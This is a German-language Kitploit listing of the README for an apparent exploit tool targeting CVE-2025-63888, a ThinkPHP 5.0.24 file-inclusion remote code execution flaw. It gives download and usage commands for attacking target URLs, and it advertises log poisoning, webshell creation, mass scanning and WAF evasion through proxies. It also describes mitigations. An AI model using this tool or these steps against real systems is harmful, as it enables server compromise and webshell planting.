Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-63888-exploit — Sicherheitsforschungstool zum Erkennen und Testen von CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability) | Kitploit
Tools/GitHubGitHub/an5i/cve-2025-63888-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Sicherheitsforschungstool zum Erkennen und Testen von CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)

Repository anzeigen
1042vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-63888 ThinkPHP 5.0.24 Datei-Inklusion RCE Exploit

Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-63888-Schwachstelle in ThinkPHP 5.0.24, die durch Datei-Inklusion Remote Code Execution ermöglicht.

⚠️ Haftungsausschluss

Dieses Tool dient nur für autorisierte Sicherheitstests und Bildungszwecke. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.

📋 Übersicht

CVE-2025-63888 ist eine kritische Remote Code Execution-Schwachstelle in ThinkPHP 5.0.24. Die Schwachstelle besteht in der read-Funktion in thinkphp/library/think/template/driver/File.php, die es Angreifern ermöglicht, durch Manipulation des Vorlagenpfads in der view()-Funktion beliebigen Code auszuführen.

CVSS-Score: 9,8 (Kritisch)
Betroffene Version: ThinkPHP 5.0.24 (exakte Version)
Angreifbare Datei: thinkphp/library/think/template/driver/File.php -Methode


Angreifbare Funktion:
read()

🔍 Funktionen

  • Automatische ThinkPHP-Erkennung: Identifiziert ThinkPHP-Installationen und -Versionen
  • Schwachstellentest: Testet auf CVE-2025-63888 Datei-Inklusion-Schwachstelle
  • Endpunkt-Erkennung: Findet automatisch angreifbare Endpunkte
  • Datei-Inklusion Ausnutzung: Demonstriert Datei-Inklusionsfähigkeit
  • Log-Datei-Vergiftung: Versucht Log-Dateien für RCE zu vergiften
  • Webshell-Erstellung: Erstellt Webshells via Datei-Inklusion
  • Befehlsausführung: Führt beliebige Befehle aus (für autorisierte Tests)
  • Multithreading-Unterstützung: Scannt mehrere Ziele parallel
  • Proxy-Unterstützung: Umgeht WAF/Cloudflare-Einschränkungen
  • JSON-Export: Detaillierte Ergebnisse im JSON-Format

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip (Python-Paketmanager)

Schnellinstallation

root@kitploit:~
# Repository klonen
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Abhängigkeiten installieren
pip install -r requirements.txt

# Skript ausführbar machen (optional)
chmod +x cve_2025_63888_exploit.py

Alternative: Direkter Download

root@kitploit:~
# Skript herunterladen
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Abhängigkeiten installieren
pip install requests

🚀 Verwendung

Grundlegende Nutzung

root@kitploit:~
# Einzelnes Ziel
python3 cve_2025_63888_exploit.py -u http://target.com

# Eigenen Befehl ausführen
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Mehrere Ziele aus Datei
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# Mit Threading für schnelleres Scannen
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Ausführliche Ausgabe zum Debuggen
python3 cve_2025_63888_exploit.py -u http://target.com -v

Mit Proxys

root@kitploit:~
# Einzelner Proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Mehrere Proxys aus Datei
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Befehlszeilenoptionen

root@kitploit:~
-u, --url          Ziel-URL
-f, --file         Datei mit Ziel-URLs (eine pro Zeile)
-c, --command      Auszuführender Befehl (Standard: id)
-t, --threads      Anzahl der Threads (Standard: 1)
-o, --output       Ausgabedatei (Standard: uknf_results.json)
-v, --verbose      Ausführliche Protokollierung aktivieren
--proxy            Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list       Datei mit Proxy-URLs (eine pro Zeile)

📊 Ausgabe

Das Skript erzeugt eine JSON-Datei mit detaillierten Ergebnissen:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Funktionsweise

  1. Erkennungsphase: Scannt nach ThinkPHP-Framework-Indikatoren
  2. Versionserkennung: Versucht die ThinkPHP-Version (5.0.24) zu identifizieren
  3. Schwachstellentest: Testet auf Datei-Inklusion-Schwachstelle
  4. Endpunkt-Erkennung: Findet angreifbare Endpunkte mit der view()-Funktion
  5. Ausnutzung: Demonstriert RCE-Fähigkeit durch Datei-Inklusion

🛡️ Abhilfe

Wenn Sie ThinkPHP 5.0.24 verwenden:

  1. Sofort aktualisieren:

    • Auf ThinkPHP 5.0.25+ oder höher aktualisieren
    • Oder auf ThinkPHP 6.x/7.x aktualisieren
  2. Pfadvalidierung implementieren:

    • Strenge Pfadvalidierung in der view()-Funktion hinzufügen
    • Verzeichnis-Traversal-Zeichen blockieren (../, ..)
    • Vorlagenpfade auf eine Whitelist von Verzeichnissen beschränken
  3. Code-Ebene-Fixes:

    • Vorlagenpfade vor der Verarbeitung validieren
    • realpath() verwenden, um sicherzustellen, dass Dateien in erlaubten Verzeichnissen liegen
    • Funktions-Whitelist implementieren

📚 Referenzen

  • CVE: CVE-2025-63888
  • GitHub Gist: CVE-2025-63888 Details
  • Yuque-Artikel: Detaillierte Analyse
  • ThinkPHP-Handbuch: Offizielle Dokumentation

📖 Beispiele

Beispiel 1: Einzelner Ziel-Scan

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

Beispiel 2: Mehrere Ziele mit Ausgabe

root@kitploit:~
# Zieldatei erstellen
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan ausführen
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Beispiel 3: Benutzerdefinierte Befehlsausführung

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Beispiel 4: Verwendung von Proxys

root@kitploit:~
# Einzelner Proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Mehrere Proxys aus Datei
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Mitwirken

Beiträge sind willkommen! Bitte reichen Sie einen Pull Request ein.

  1. Repository forken
  2. Ihren Feature-Branch erstellen (git checkout -b feature/AmazingFeature)
  3. Ihre Änderungen committen (git commit -m 'Add some AmazingFeature')
  4. In den Branch pushen (git push origin feature/AmazingFeature)
  5. Einen Pull Request öffnen

🐛 Probleme

Wenn Sie auf Probleme stoßen oder Vorschläge haben, eröffnen Sie bitte ein Issue auf GitHub.

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.

⭐ Sternverlauf

Wenn Sie dieses Tool nützlich finden, erwägen Sie bitte, ihm auf GitHub einen Stern zu geben!

⚖️ Rechtliches

Dieses Tool wird nur zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Berechtigung verfügen.

🙏 Danksagungen

  • Ursprünglicher Schwachstellenmelder: Master-0-0
  • ThinkPHP-Sicherheitscommunity
  • Sicherheitsforscher, die zur Schwachstellenanalyse beigetragen haben

💰 Spenden

Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Vielen Dank für Ihre Unterstützung! 🙏

Tool herunterladen